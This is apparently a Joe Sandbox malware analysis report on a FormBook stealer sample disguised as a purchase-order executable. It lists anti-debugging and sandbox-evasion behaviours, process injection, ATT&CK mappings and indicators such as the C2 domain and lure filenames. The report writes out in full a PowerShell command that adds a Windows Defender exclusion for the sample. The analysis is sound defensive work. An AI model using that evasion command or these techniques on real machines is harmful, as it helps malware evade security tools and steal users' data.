Source: powershell.exe, 00000006.00000003.343279532.0000000005825000.00000004.00000001.sdmp | Binary or memory string: Hyper-V
Source: powershell.exe, 00000006.00000003.343279532.0000000005825000.00000004.00000001.sdmp | Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | Process information queried: ProcessInformation
The delays and the Hyper-V strings above are attributed to powershell.exe, not to the sample; the strings are the path of the built-in Hyper-V PowerShell module, so they are host background rather than evidence that the sample looked for a hypervisor.

          Anti Debugging:

Contains functionality to hide a thread from the debugger
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe; Code function: 0_2_015096C8 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,0150B5EF,00000000,00000000
Hides threads from debuggers
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe; Thread information set: HideFromDebugger (14 occurrences)
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe; Process queried: DebugPort (3 occurrences)
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe; Code function: 12_2_004088B0 rdtsc
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe; Code function: 0_2_00BBD91C LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe; Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

Adds a directory exclusion to Windows Defender
Source: unknown; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe' -Force
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe' -Force
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe; Memory written: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe' -Force
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe; Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe; Process created: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe; Queries volume information: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe VolumeInformation
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match; File source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

Yara detected FormBook
Source: Yara match; File source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation | Path Interception | Process Injection111 | Masquerading11 | OS Credential Dumping | Security Software Discovery331 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion14 | LSASS Memory | Virtualization/Sandbox Evasion14 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools11 | Security Account Manager | Process Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection111 | NTDS | Application Window Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information2 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing1 | Cached Domain Credentials | File and Directory Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Timestomp1 | DCSync | System Information Discovery112 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

          Behavior Graph


          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 356528 | Sample: Purchase_order_397484658464... | Start date: 23/02/2021 | Architecture: WINDOWS | Score: 100
Start
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Icon mismatch, binary includes an icon from a different legit application in order to fool users; 7 other signatures
  Purchase_order_397484658464974945648447564845.exe (17 3) started
    DNS/IP: coroloboxorozor.com 104.21.71.230, 49711, 80 CLOUDFLARENETUS United States
    Signatures: Adds a directory exclusion to Windows Defender; Tries to detect virtualization through RDTSC time measurements; Hides threads from debuggers; 2 other signatures
    cmd.exe (1) started
      conhost.exe started
      timeout.exe (1) started
    powershell.exe (25) started
      conhost.exe started
    WerFault.exe (23 9) started
    Purchase_order_397484658464974945648447564845.exe started

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
Purchase_order_397484658464974945648447564845.exe | 41% | Virustotal |
Purchase_order_397484658464974945648447564845.exe | 32% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
Purchase_order_397484658464974945648447564845.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://coroloboxorozor.com/base/C02C82A7124B198823DC14A0727ADA5A.html | 0% | Avira URL Cloud | safe
http://coroloboxorozor.com/base/23DEF5FFA542BB2D1BCA37F7C5ECC686.html | 0% | Avira URL Cloud | safe
http://coroloboxorozor.com | 0% | Avira URL Cloud | safe
www.aubonmarcheduparc.com/rina/ | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
coroloboxorozor.com | 104.21.71.230 | true | false | | unknown

            Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://coroloboxorozor.com/base/C02C82A7124B198823DC14A0727ADA5A.html | false | Avira URL Cloud: safe | unknown
http://coroloboxorozor.com/base/23DEF5FFA542BB2D1BCA37F7C5ECC686.html | false | Avira URL Cloud: safe | unknown
www.aubonmarcheduparc.com/rina/ | true | Avira URL Cloud: safe | low

            URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://coroloboxorozor.com | Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.286130454.0000000002E61000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.286130454.0000000002E61000.00000004.00000001.sdmp | false | | high

              Contacted IPs


              Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.71.230 | unknown | United States | 13335 | CLOUDFLARENETUS | false

              General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 356528
Start date: 23.02.2021
Start time: 09:35:46
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 14s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Purchase_order_397484658464974945648447564845.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 35
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@12/9@1/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 47.3% (good quality ratio 45.4%)
• Quality average: 76.7%
• Quality standard deviation: 28%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 104.43.139.144, 52.255.188.83, 92.122.145.220, 104.42.151.234, 13.64.90.137, 52.147.198.201, 184.30.20.56, 51.104.139.180, 8.253.207.120, 8.253.95.121, 8.248.139.254, 8.253.95.249, 8.248.119.254, 20.54.26.129, 204.79.197.200, 13.107.21.200, 51.11.168.160, 92.122.213.247, 92.122.213.194
• Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

              Simulations

              Behavior and APIs

Time | Type | Description
09:37:10 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
09:37:22 | API Interceptor | 31x Sleep call for process: powershell.exe modified

              Joe Sandbox View / Context

              IPs

Match | Associated Sample Name / URL | Detection | Context
104.21.71.230 | 0603321WG_0_1 pdf.exe | malicious | coroloboxorozor.com/base/008D1C43D45C0A742A0D32B591796DBD.html
104.21.71.230 | VIws8bzjD5.exe | malicious | coroloboxorozor.com/base/C56E2AF17B6C065E85DB9FFDA54E4A78.html
104.21.71.230 | quotation_PR # 00459182..exe | malicious | coroloboxorozor.com/base/4FD4067B934700360B786D96F374CFDE.html
104.21.71.230 | PURCHASE ORDER CONFIRMATION.exe | malicious | coroloboxorozor.com/base/13F70A6846505248D031FD970E34143C.html
104.21.71.230 | PAYRECEIPT.exe | malicious | coroloboxorozor.com/base/FB9E1E734185F7528241A9972CE86875.html
104.21.71.230 | New Order.exe | malicious | coroloboxorozor.com/base/787C0D9D971EA648C79BB43D6A91B32D.html
104.21.71.230 | TT.exe | malicious | coroloboxorozor.com/base/67C230E277706E38533C2138734032C2.html
104.21.71.230 | Payment_pdf.exe | malicious | coroloboxorozor.com/base/07E3F6F835A7792863F708E23906CE42.html
104.21.71.230 | TT.exe | malicious | coroloboxorozor.com/base/40B9FF72D3F4D8DF64BA5DD4E106BE04.html
104.21.71.230 | purchase order 1.exe | malicious | coroloboxorozor.com/base/AEF764C22A189B57AC28E3EBBC72AEBF.html
104.21.71.230 | telex transfer.exe | malicious | coroloboxorozor.com/base/EB6932098F110FB9EB9C8B27A1730610.html
104.21.71.230 | ORDER PURCHASE ITEMS.exe | malicious | coroloboxorozor.com/base/20872932CF927ACBA3BF36E6C823C99C.html
104.21.71.230 | Doc_3975465846584657465846486435454,pdf.exe | malicious | coroloboxorozor.com/base/92C7F4831C860C5A2BD3269A6771BC0C.html
104.21.71.230 | CV-JOB REQUEST______pdf.exe | malicious | coroloboxorozor.com/base/38A59769F794F78901E2621810DAAA3A.html
104.21.71.230 | CN-Invoice-XXXXX9808-19011143287989.exe | malicious | coroloboxorozor.com/base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html
104.21.71.230 | Download_quotation_PR #371073.exe | malicious | coroloboxorozor.com/base/ABC115F63E3898678C2BE51E3DFF397C.html
104.21.71.230 | CN-Invoice-XXXXX9808-19011143287990.exe | malicious | coroloboxorozor.com/base/84D1B49C9212CA5D522F0AF86A906727.html
104.21.71.230 | PurchaseOrdersCSTtyres004786587.exe | malicious | coroloboxorozor.com/base/532020C7A3B820370CFAAC4888397C0C.html

              Domains

Match | Associated Sample Name / URL | Detection | Context
coroloboxorozor.com | 0603321WG_0_1 pdf.exe | malicious | 172.67.172.17
coroloboxorozor.com | Payment_pdf.exe | malicious | 172.67.172.17
coroloboxorozor.com | RG6ws8jWUJ.exe | malicious | 172.67.172.17
coroloboxorozor.com | VIws8bzjD5.exe | malicious | 104.21.71.230
coroloboxorozor.com | PURCHASE ITEMS.exe | malicious | 172.67.172.17
coroloboxorozor.com | CN-Invoice-XXXXX9808-19011143287992.exe | malicious | 172.67.172.17
coroloboxorozor.com | quotation_PR # 00459182..exe | malicious | 104.21.71.230
coroloboxorozor.com | PURCHASE ORDER CONFIRMATION.exe | malicious | 104.21.71.230
coroloboxorozor.com | PAYMENTADVICENOTE103_SWIFTCOPY0909208.exe | malicious | 172.67.172.17
coroloboxorozor.com | XP 6.xlsx | malicious | 172.67.172.17
coroloboxorozor.com | PAYRECEIPT.exe | malicious | 104.21.71.230
coroloboxorozor.com | New Order.exe | malicious | 104.21.71.230
coroloboxorozor.com | PO#87498746510.exe | malicious | 172.67.172.17
coroloboxorozor.com | TT.exe | malicious | 172.67.172.17
coroloboxorozor.com | Payment_pdf.exe | malicious | 172.67.172.17
coroloboxorozor.com | TT.exe | malicious | 104.21.71.230
coroloboxorozor.com | purchase order 1.exe | malicious | 104.21.71.230
coroloboxorozor.com | telex transfer.exe | malicious | 104.21.71.230
coroloboxorozor.com | Invoices.exe | malicious | 172.67.172.17
coroloboxorozor.com | ORDER PURCHASE ITEMS.exe | malicious | 104.21.71.230

              ASN

              Match | Associated Sample Name / URL | Detection | Context
              CLOUDFLARENET (US) | 0603321WG_0_1 pdf.exe | malicious | 172.67.172.17
              CLOUDFLARENET (US) | Payment_pdf.exe | malicious | 172.67.172.17
              CLOUDFLARENET (US) | 8WjU4jrBIr.exe | malicious | 104.23.98.190
              CLOUDFLARENET (US) | RG6ws8jWUJ.exe | malicious | 172.67.172.17
              CLOUDFLARENET (US) | 8TD8GfTtaW.exe | malicious | 104.23.99.190
              CLOUDFLARENET (US) | lpdKSOB78u.exe | malicious | 104.21.76.239
              CLOUDFLARENET (US) | VIws8bzjD5.exe | malicious | 172.67.172.17
              CLOUDFLARENET (US) | PURCHASE ITEMS.exe | malicious | 172.67.172.17
              CLOUDFLARENET (US) | Shipping Document PL&BL Draft.exe | malicious | 172.67.188.154
              CLOUDFLARENET (US) | CN-Invoice-XXXXX9808-19011143287992.exe | malicious | 172.67.172.17
              CLOUDFLARENET (US) | Halkbank_Ekstre_20210223_082357_541079.exe | malicious | 172.67.188.154
              CLOUDFLARENET (US) | quotation_PR # 00459182..exe | malicious | 172.67.172.17
              CLOUDFLARENET (US) | FOB offer_1164087223_I0133P2100363812.PDF.exe | malicious | 104.21.19.200
              CLOUDFLARENET (US) | PURCHASE ORDER CONFIRMATION.exe | malicious | 172.67.188.154
              CLOUDFLARENET (US) | 22 FEB -PROCESSING.xlsx | malicious | 172.67.160.246
              CLOUDFLARENET (US) | Yao Han Industries 61007-51333893QR001U,pdf.exe | malicious | 172.67.188.154
              CLOUDFLARENET (US) | PAYMENTADVICENOTE103_SWIFTCOPY0909208.exe | malicious | 172.67.172.17
              CLOUDFLARENET (US) | ORDER LIST.xlsx | malicious | 23.227.38.74
              CLOUDFLARENET (US) | (appproved)WJO-TT180,pdf.exe | malicious | 104.21.19.200
              CLOUDFLARENET (US) | purchase order.exe | malicious | 172.67.188.154

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_FHT3HKMJH1ZKMAUJ_63dc89b543dd5b8bd95060c21de7ec51b1eab522_890bc815_0a751f92\Report.wer
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):16530
              Entropy (8bit):3.7798130057613126
              Encrypted:false
              SSDEEP:192:+dadoJlUMmHBUZMXDWHaKsUAeZiN/u7sjS274It+3nC:XelWBUZMXSalmW/u7sjX4ItQC
              MD5:791FB84864502BB68F48D9ABD3AC9B61
              SHA1:DA3B6713E232E3C446CB574273B812ABD6921D9C
              SHA-256:E91401FE97BE9D71A60408604D553E105B0F97BC53079D25A9CCFA92C9C1F96C
              SHA-512:140EF3C1F5B3EA29E036F8629C8D059DF14DAD237F437119E184585DD71912E2C34A828BF05234FEDC9FA09623E0140BE97C0F796404FC6BCD6F6E5EF2C6E839
              Malicious:false
              Reputation:low
